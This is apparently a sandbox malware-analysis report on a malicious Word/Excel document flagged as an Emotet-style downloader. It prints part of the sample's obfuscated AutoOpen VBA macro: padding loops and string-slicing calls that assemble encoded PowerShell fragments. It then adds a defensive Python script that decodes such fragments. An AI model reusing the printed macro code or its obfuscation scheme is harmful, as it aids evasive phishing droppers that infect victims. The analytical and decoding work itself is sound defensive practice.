MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is flagged as malicious by ClamAV (Doc.Malware.Emodldr-10025032-0), and the heuristics show an auto-executing VBA macro (AutoOpen) that calls CreateObject, a combination typically used to download and execute a second-stage payload. The extracted VBA source (macros.bas) is heavily obfuscated: the visible logic consists of padding loops around calls to a helper (YroCp) that takes a string literal plus offset and length arguments and returns base64-like fragments, and one of those literals carries a plaintext PowerShell tail (ConvertTo-SecureString -Key ...). Together with the auto-execution markers this strongly suggests downloader or dropper functionality.
Heuristics (9)
- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Note: the generic description of the WordBasic marker says no VBA project was recovered, but a VBA project was recovered from this sample (macros.bas below), so read that marker as corroboration of the AutoOpen finding rather than as a separate execution surface. The only extracted URL is an OOXML schema namespace, not a download location; the actual second-stage URL, if any, is inside the encoded fragments.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45732 bytes |

SHA-256: e50a3d0c57f1d1e0080b0cecff4742fc2b707ed908466398288781720b41e44e
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 25 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BrDFLszDNdQwl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "vrVRATzumvjzbu"
Function CfZijKaRrWbs()
On Error Resume Next
For Each jTGdX In zzhXYZ
JvEDpP = 51005 - rsCDS
For Each vkJznF In jjRMHD
fKCJOa = knzlQ
Next
Next
stPMzKTDfdj = YroCp("PQA3ADcAYgA3ADQAYQA3AGYAMgA5ADIAOQBmADYAZABjADQAMQAxAPGL@Sws1", 2, 52)
For Each JoaEZE In DMYZk
pcMmr = 66455 - ufhqs
For Each snLzJM In LmrJM
CwcSmc = ulaYB
Next
Next
For Each DvwvA In ZEqliK
wHHZY = 32922 - znbiq
For Each CHJjX In iKLPpm
rBzjEz = oYljj
Next
Next
wBTvzi = YroCp("EAGMAMwA5ADkAMABiADIAOQA5ADYAMwAzAGIAOQBjADYAZgAwAGEAZgBkADYAMwA5AGQAZQBkAGYAOABkADIANQAzADcAMQBkADMAYQBlADYAOAAxAGUANQA3ADkAYgAwAGMAMwAwADMAMgBkADIAZQBkAGIAZgAxADkAOQA1ADcANwA4AdNDOl", 2, 177)
For Each owPQUR In cbRuG
EbMmr = 35460 - jZTwGX
For Each kjdVZD In pkvvvX
MPkEZq = fcmtRt
Next
Next
For Each LLPFRw In imXTVH
Jhkvi = 22021 - WdnqA
For Each qwMsV In BKRBv
oJpaVL = fdvQZ
Next
Next
XOKYuft = YroCp("hifd77BiADUAZAAzADkAMQBmAGUAZQA2ADUAZgA3ADYAYQBkAGMAOQAwADAANQAwAGYAZAA3ADMAMwA2AGYAZgBmAdjm", 7, 83)
For Each Vhbpib In QYFfZ
zJGwsj = 77491 - uBdvHb
For Each Vuvhn In AiaUjZ
iPDKAr = KYfCj
Next
Next
For Each ZuEHj In viEOz
YFfRw = 54721 - mGqVbM
For Each QvBozs In JOAdWR
qCtBS = KlqNFb
Next
Next
KiIjfJmVZt = YroCp("HDAANgBkADcAYwBmADQAYgA0AGYAOQAyADUAYwAwADEAZABlADAAMwAxAGQAYwAxADcAZgBjADgAOQBhAGQAOAAxADQAYwAxAGUAMwBmADIAOQA2AGYAMwBjAHtDLs", 2, 120)
For Each vNiZc In BsAdPQ
bPrfn = 53784 - uwDzT
For Each iTiFn In Wnwwfa
aPKqY = kLCvuL
Next
Next
For Each nLwUt In HuAmY
kDFHaz = 24292 - XRtEYB
For Each twQXk In Imiiwd
aPiOF = EmYYrm
Next
Next
aFWhrMGIGwZ = YroCp("bC7bPHKMgB8AGwAYwBIAGsAWQBwv", 8, 19)
For Each HpWRrv In DNwjPn
bQXZcU = 94333 - Inizb
For Each PUXZlt In TQQqCl
NRuwR = cVBzO
Next
Next
For Each AJMLQ In XYIVj
UvrXnf = 31545 - wokIaZ
For Each DRfwsv In pjuwmZ
zticG = baFzM
Next
Next
WCRoUToITuC = YroCp("I%iLVYgBmADAANgA0ADgAMwBhAGIAMgBiAA=='| CONverTto-SEcUrEstRInG -KE 107,14,255,180,169,48,26,16,200,134,123,115,224,73,153,89,149,125,38,2hmw", 6, 133)
For Each kaLYEl In EUHcWr
jFLcos = 82640 - wvFfT
For Each VdLim In LNiHq
vVCsR = lMcWP
Next
Next
For Each NOVibj In IGbjif
CsswS = 15980 - bUnml
For Each jiDFR In ZhzUCv
jQjtui = jaVbU
Next
Next
iRQjFOR = YroCp("P.ADQANgAyAGYAYQBhADgANQAyADAANQA4AGMANAA5AGMAOQAxAm@0tEh", 3, 49)
For Each tYmths In iJaDVS
FWEXp = 3477 - btubtI
For Each VJMblq In AvEnKF
XqcXbb = JVwlSm
Next
Next
For Each YRQRal In SzjwIC
fXcXRh = 22596 - OUbBLM
For Each dBVlh In HwEcr
tzCWP = rqpIh
Next
Next
GlXHDVpOk = YroCp(",ikwwMZA0s", 8, 1)
For Each bUuCvq In aPKWi
XUnXZX = 89299 - JSfMwM
For Each UWRUTl In NJFCO
RJicU = shDSPk
Next
Next
For Each jtcmwo In rEJIjc
shRMbU = 43815 - zIWuLc
For Each wbDiDi In kLwVP
khKzjt = BmEzt
Next
Next
zHwsibqCHp = YroCp("kMS7V7GIAZQA4AGEAMgBkADIAMAAzADUAZgBmADQAYQBlADgAYgAzAGMAYgBkADkAOQBkADcAYgA2iQJ", 7, 71)
For Each IuUQCc In CHhEB
rTzFP = 11108 - ZqSzW
For Each SYoKW In pcafP
tszvdz = wJBlD
Next
Next
For Each koHTi In zjfkmo
pOGPkR = 11760 - uPhMo
For Each DNKZa In bMjPzA
YZdtiB = POMOz
Next
Next
cirzwf = YroCp("n%qXzHA4AGYANgA1ADYAYgBlAGUAYwBlADQAZQBkADMAMQd.9", 7, 40)
For Each OFqZaH In ttSULL
EchrPk = 61006
... (truncated)
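The preview above is the typical shape of a string-slicing VBA obfuscator: every YroCp(literal, start, length) call cuts a fragment out of a literal that has junk characters on either side, and the fragments are concatenated into one string before execution. The "A"-heavy base64 (a null in every second byte) indicates UTF-16LE text, and the literal on the ConvertTo-SecureString line shows the assembled string ends in plaintext PowerShell with a -KE parameter, which PowerShell accepts as an unambiguous abbreviation of -Key (ConvertTo-SecureString requires a 16, 24 or 32 byte key). The script below is an added example, not code from the analyzer or from the sample. It assumes YroCp behaves like VBA Mid$(s, start, length); that is consistent with the junk prefix lengths in the preview (for instance the six-character prefix before the 83-character fragment taken with start 7), but YroCp's definition is not in the visible preview, so confirm it in macros.bas before trusting the output. The VBA snippet and its literals are constructed for the example and are not taken from macros.bas; the file name recover.py is hypothetical.

```python
"""Reassemble and decode the fragments an obfuscated VBA downloader builds with a Mid$-style helper.

Added example, not from the report or the sample. Assumption: YroCp(s, start, length)
is equivalent to VBA Mid$(s, start, length) (1-based start).
"""
import base64
import re

# Constructed sample in the shape of the preview above; the literals are made up
# for this example and are NOT taken from macros.bas.
SAMPLE_VBA = r'''
Function Stage()
    On Error Resume Next
    For Each a In b
        c = 51005 - d
    Next
    s1 = YroCp("zqcABvAHcAZQ!!", 3, 10)
    For Each e In f
        g = h
    Next
    s2 = YroCp("kByAHMAaABlxx", 2, 10)
    s3 = YroCp("AGwAbAA='| CoNvErTtO-SeCuReStRiNg -Key 1,2,3@@", 1, 44)
End Function
'''

CALL_RE = re.compile(r'YroCp\("([^"]*)",\s*(\d+),\s*(\d+)\)')
B64_RE = re.compile(r'[A-Za-z0-9+/]+={0,2}')          # leading base64 run of the joined string
KEY_RE = re.compile(r'-ke(?:y)?\s+([0-9]+(?:,[0-9]+)*)', re.IGNORECASE)  # -Key or its -KE abbreviation


def vba_mid(s, start, length):
    """VBA Mid$(): start is 1-based; a start past the end yields an empty string."""
    return s[start - 1:start - 1 + length]


def extract_fragments(src):
    """Fragments in source order, after applying the Mid$ slice to each literal."""
    return [vba_mid(s, int(a), int(n)) for s, a, n in CALL_RE.findall(src)]


def split_b64_prefix(joined):
    """Split the assembled string into its base64 head and the plaintext tail that follows it."""
    m = B64_RE.match(joined)
    if not m:
        return "", joined
    return m.group(0), joined[m.end():]


def decode_blob(b64):
    """Base64-decode, repairing missing '=' padding, and pick UTF-16LE when every second byte is null."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def recover(src):
    """Return the joined string, the decoded base64 head, the plaintext tail and any -Key byte list."""
    joined = "".join(extract_fragments(src))
    b64, tail = split_b64_prefix(joined)
    m = KEY_RE.search(tail)
    key = [int(x) for x in m.group(1).split(",")] if m else []
    return {"joined": joined,
            "decoded": decode_blob(b64) if b64 else "",
            "tail": tail,
            "key": key}


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_VBA
    r = recover(src)
    print("decoded :", r["decoded"])
    print("tail    :", r["tail"])
    print("key     :", r["key"], "bytes:", len(r["key"]), "(ConvertTo-SecureString accepts 16, 24 or 32)")
```

Run it as `python recover.py macros.bas` to process the carved artifact. Two caveats for the real sample: the preview assigns fragments to different variables, so if the decoded head comes out garbled, group the fragments by the variable that receives them (or by the concatenation expression further down the file) instead of joining every call in source order; and a decoded head that is itself hex text is the expected shape for ConvertTo-SecureString input, so the next layer needs the full -Key list, which is truncated in the preview.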